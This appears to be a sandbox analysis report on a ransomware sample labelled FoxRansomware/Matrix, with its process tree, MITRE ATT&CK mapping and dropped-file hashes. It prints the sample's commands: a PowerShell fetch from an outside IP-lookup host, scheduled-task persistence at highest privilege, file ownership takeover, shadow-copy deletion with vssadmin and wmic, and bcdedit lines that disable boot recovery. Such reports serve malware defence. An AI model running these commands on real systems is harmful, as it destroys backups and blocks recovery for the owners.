PID 756 wrote to memory of 5688	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 4804	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 4804	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 4804	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 5688 wrote to memory of 4448	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 4448	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 4448	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 2852	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 2852	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 2852	5688	cmd.exe	reg.exe
PID 756 wrote to memory of 888	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 888	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 888	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 4804 wrote to memory of 4536	4804	cmd.exe	wscript.exe
PID 4804 wrote to memory of 4536	4804	cmd.exe	wscript.exe
PID 4804 wrote to memory of 4536	4804	cmd.exe	wscript.exe
PID 5688 wrote to memory of 4780	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 4780	5688	cmd.exe	reg.exe
PID 5688 wrote to memory of 4780	5688	cmd.exe	reg.exe
PID 888 wrote to memory of 4500	888	cmd.exe	attrib.exe
PID 888 wrote to memory of 4500	888	cmd.exe	attrib.exe
PID 888 wrote to memory of 4500	888	cmd.exe	attrib.exe
PID 4536 wrote to memory of 2880	4536	wscript.exe	cmd.exe
PID 4536 wrote to memory of 2880	4536	wscript.exe	cmd.exe
PID 4536 wrote to memory of 2880	4536	wscript.exe	cmd.exe
PID 2880 wrote to memory of 7008	2880	cmd.exe	schtasks.exe
PID 2880 wrote to memory of 7008	2880	cmd.exe	schtasks.exe
PID 2880 wrote to memory of 7008	2880	cmd.exe	schtasks.exe
PID 888 wrote to memory of 9772	888	cmd.exe	cacls.exe
PID 888 wrote to memory of 9772	888	cmd.exe	cacls.exe
PID 888 wrote to memory of 9772	888	cmd.exe	cacls.exe
PID 4536 wrote to memory of 3980	4536	wscript.exe	cmd.exe
PID 4536 wrote to memory of 3980	4536	wscript.exe	cmd.exe
PID 4536 wrote to memory of 3980	4536	wscript.exe	cmd.exe
PID 888 wrote to memory of 10140	888	cmd.exe	takeown.exe
PID 888 wrote to memory of 10140	888	cmd.exe	takeown.exe
PID 888 wrote to memory of 10140	888	cmd.exe	takeown.exe
PID 3980 wrote to memory of 8180	3980	cmd.exe	schtasks.exe
PID 3980 wrote to memory of 8180	3980	cmd.exe	schtasks.exe
PID 3980 wrote to memory of 8180	3980	cmd.exe	schtasks.exe
PID 888 wrote to memory of 9676	888	cmd.exe	cmd.exe
PID 888 wrote to memory of 9676	888	cmd.exe	cmd.exe
PID 888 wrote to memory of 9676	888	cmd.exe	cmd.exe
PID 9676 wrote to memory of 8860	9676	cmd.exe	HPTbJaR9.exe
PID 9676 wrote to memory of 8860	9676	cmd.exe	HPTbJaR9.exe
PID 9676 wrote to memory of 8860	9676	cmd.exe	HPTbJaR9.exe
PID 8860 wrote to memory of 6812	8860	HPTbJaR9.exe	HPTbJaR964.exe
PID 8860 wrote to memory of 6812	8860	HPTbJaR9.exe	HPTbJaR964.exe
PID 9728 wrote to memory of 9372	9728	cmd.exe	vssadmin.exe
PID 9728 wrote to memory of 9372	9728	cmd.exe	vssadmin.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4500 attrib.exe

pid	process
4500	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:756
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe"
  2⤵
  PID:4900
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3528
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sh0xZKMv.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5264
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\g4TNSf12.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\g4TNSf12.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Om77BD4u.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2880
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Om77BD4u.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:7008
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3980
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:8180
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\MyZplpC7.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\MyZplpC7.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Bz1SrKdj.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Views/modifies file attributes
    PID:4500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:9772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:10140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c HPTbJaR9.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:9676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\HPTbJaR9.exe
      HPTbJaR9.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:8860
    - - C:\Users\Admin\AppData\Local\Temp\HPTbJaR964.exe
        
        HPTbJaR9.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:6812

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Om77BD4u.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:9728
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:9372
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:9712
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:10064
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:332
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:4812

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-1168293393-3419776239-306423207-1000\desktop.ini

Filesize
1KB

MD5
186cd829b204d8868af918e50b117f94

SHA1
9f1f0f68dc3e27b296cc4bd6132b352bfc044212

SHA256
87beafdf07492dcc59f4f4aa421eab4bb3063eb0adbf19cbea4ed4d8933e3c48

SHA512
d4f57f959278a5bb237f27b6bcb6a3d9dbb2740f987598b325dcf0adb1d4578cb13956f1fe40ac3269343ca6259a8c8c17e3e20e767b6580e989ebb8603ee7db

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf

Filesize
8KB

MD5
966d6932b42e60689add6145730b6709

SHA1
603d241341407bd1433e3d9b40ab29810741abed

SHA256
6e638c0558196d58fc35916771df9a48b90ac5c1e853297eac0fd0aa907f5b23

SHA512
fecc86b7b95f7ae5a1a5b5b50d6c11692cccfd06f0daa54b3b76728bed863c06cb3a26287d60cc00cda9f63b84540c2da1fea8e772ff5dba6e14001ce0871a3b

Download Submit
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\[[email protected] ].Yctmwr7w-bTJKEwwh.FOX

Filesize
3.3MB

MD5
8e3e456103e2e767a1f68ec10abc0bfa

SHA1
b6392c4df15c7a762194db3623b157a0a2955680

SHA256
a4cee0be94c8909c6b1e4ba0995dffa5e1bd0fa2961ee5a132a399be6d1c8eac

SHA512
364f3ed6cdfa14f7e9c5d6c9368296a079baa68a11215e2a42e9402c0fd1050c9925b5e1b08da60794ec8803235b1b7a7de21a4542dc12608c6cc6bd756558a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
247d60e55bf6ccd9fae3f9d651e90fb8

SHA1
f68826b6808d9196cf4b55f7cca21c13b7a314a5

SHA256
4d15fdabe22c51702eaaa81f3e9b5e74b98989d4583793b3ce2ce8468f1c0129

SHA512
01197851ae41b95aa7a7141a5f25645e9d80a63dd80f6bf2cd013d6581cc18b09a9021067e80f565f7b4ddde169cd3e6920a3f307f441aa99ddd7f08d77630d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Bz1SrKdj.bat

Filesize
246B

MD5
b39093af8eb7ab759681845335cfa8cd

SHA1
d73a41334ecbe9b77f9306a7aa74b55114165d39

SHA256
c3ab7e30eced8d401d7d3fa53a067a236db55104cd8762eb022102182c9b1efd

SHA512
15866ebae2e679f08ca2f42410f342b02fc069f1c3c71fecd8db8e21f0ca1357e71f5ffd41c8f9f1a3143278d56a3f1f340489d74c10f6685517298b678fda2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\HPTbJaR9.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe

Filesize
458KB

MD5
8279e69720eebd279cccc548bbdd9fcb

SHA1
d29876b154d4a4e64fe55b35adeec0104d812d6f

SHA256
638e3eb5af9c58d5947310a091ced46c394a045dd65f2ff2ec1e824373f8a807

SHA512
582f60b2a86268dcaec144ec2e1a82dfb4e7522347f84e98d7f83db232f932a55296454e137478e4034a91d819cfeb93441ae763033941dd3e9e44c15a504e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe

Filesize
310KB

MD5
4a4d45c93382879f05b9637867b948a0

SHA1
2d8f595dce6f93b2496aa1b46433d35417023fb5

SHA256
704e95c3ae90e7092dd1d4fe08c2d11e251ac0fd5ea3f977e565624a218f3036

SHA512
7e436205a62b7ee8f24d180d789dec69d89c42c8af584dbbc442f301b2981529db1f938f001d87c9aac35e1edd7063d7ab847bbdeec951e31f9c63a74e216541

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe

Filesize
315KB

MD5
ca0954a3c18f1825161c489d7d48bc84

SHA1
a7cd1263f16704dab5e38b345661bbfc94941946

SHA256
b39bc2fe1dc40134351cb18ef960609de6d12ebd51838f5dc647ea0afc0585b1

SHA512
d92033508703359145219168aa577cffb471c3c86059ec45355535132a925b54f647f7db2bda92e59c71b55aca4a595aca425f776d8b44edfc381ebb86a2d51a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_45AA0F52559CEC4B.txt

Filesize
130B

MD5
182d078bcbbb6115630dfe0f9d8efb36

SHA1
591a2c4c9d0c648b963fd5bb893786bba94d79db

SHA256
fc328ffa99e6cb795ad0b6d4a490e7bb0e5414529a54fc651c4199639a631a01

SHA512
5812c04eb8638fa34032ae9fd61bf2ede270f6a6543db3ba32185ac5cfd2032c32f03405d8055b2fa50fa968d0961a388decaf0de42c540bb7a418d228c03348

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_45AA0F52559CEC4B.txt

Filesize
72KB

MD5
99ee0ba90cd1893b6e180e44c61220c8

SHA1
2aac1f7e9e69da96d875bfdd113c56fa4b04be21

SHA256
125a826d4d29235d89f5c8d6e9cfaa63f4e0325184264f1bfb58761dd643f11c

SHA512
232eaf5f2d04b376bcac26bd5ce0320de1b6eb6ddae9f7e737ece309367398d281acee4e9cca6f22aa3b916c4efa805eef8934cdbe3b393d1073c74326e100dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sh0xZKMv.txt

Filesize
14B

MD5
c74dacdd9331a6698efffe81ff66ac08

SHA1
79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

SHA256
82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

SHA512
24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

Download Submit
C:\Users\Admin\AppData\Local\Temp\HPTbJaR964.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kuwp0web.1va.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Om77BD4u.bat

Filesize
265B

MD5
e099b8fb2d21606b8fc60af73cc391fd

SHA1
c45ae120c7887c343679ab5d7123ff36dd7cc78a

SHA256
c23375e785b176b1768e432f1b29e2a27ed8f9a9e5e6ea71718a1c35da126cf9

SHA512
c20378e08310ec94170762a8936b9c4c114915ced5c9a7f4539bf96a7f722efc794806ba8391d94476d8d93a5cfd99ce230a32da2d688bc3f33e0c2d3d9341d7

Download Submit
C:\Users\Admin\AppData\Roaming\g4TNSf12.vbs

Filesize
260B

MD5
2582c06d193f91b16790c8c2ffb4ed48

SHA1
53299033231369bcd59b6c16ebf0367986893890

SHA256
b3e6707500af0109ed612397af8a91553390e1b518245e06a06fa9d5bb8c6e1d

SHA512
1a7dbf115f683410017d9628ab31c9dc23cb643553f3fbf5817ef08e5d9e3b05de509e10d4472fb4b47bf2030cad27833d8ca6bce11c29a052d4f5190559b819

Download Submit
memory/756-24465-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/756-19987-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/756-14202-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3528-14434-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3528-24641-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3528-24600-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3528-24579-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3528-24535-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3528-24466-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/5264-8-0x0000000074830000-0x0000000074FE0000-memory.dmp

Filesize
7.7MB

Download
memory/5264-30-0x0000000074830000-0x0000000074FE0000-memory.dmp

Filesize
7.7MB

Download
memory/5264-12-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/5264-23-0x0000000005A60000-0x0000000005DB4000-memory.dmp

Filesize
3.3MB

Download
memory/5264-27-0x00000000063D0000-0x00000000063EA000-memory.dmp

Filesize
104KB

Download
memory/5264-10-0x0000000005070000-0x0000000005698000-memory.dmp

Filesize
6.2MB

Download
memory/5264-7-0x00000000025F0000-0x0000000002626000-memory.dmp

Filesize
216KB

Download
memory/5264-11-0x0000000005040000-0x0000000005062000-memory.dmp

Filesize
136KB

Download
memory/5264-25-0x0000000005F90000-0x0000000005FDC000-memory.dmp

Filesize
304KB

Download
memory/5264-9-0x00000000025A0000-0x00000000025B0000-memory.dmp

Filesize
64KB

Download
memory/5264-18-0x00000000058F0000-0x0000000005956000-memory.dmp

Filesize
408KB

Download
memory/5264-24-0x0000000005EE0000-0x0000000005EFE000-memory.dmp

Filesize
120KB

Download
memory/5264-26-0x0000000007750000-0x0000000007DCA000-memory.dmp

Filesize
6.5MB

Download
memory/8860-20177-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download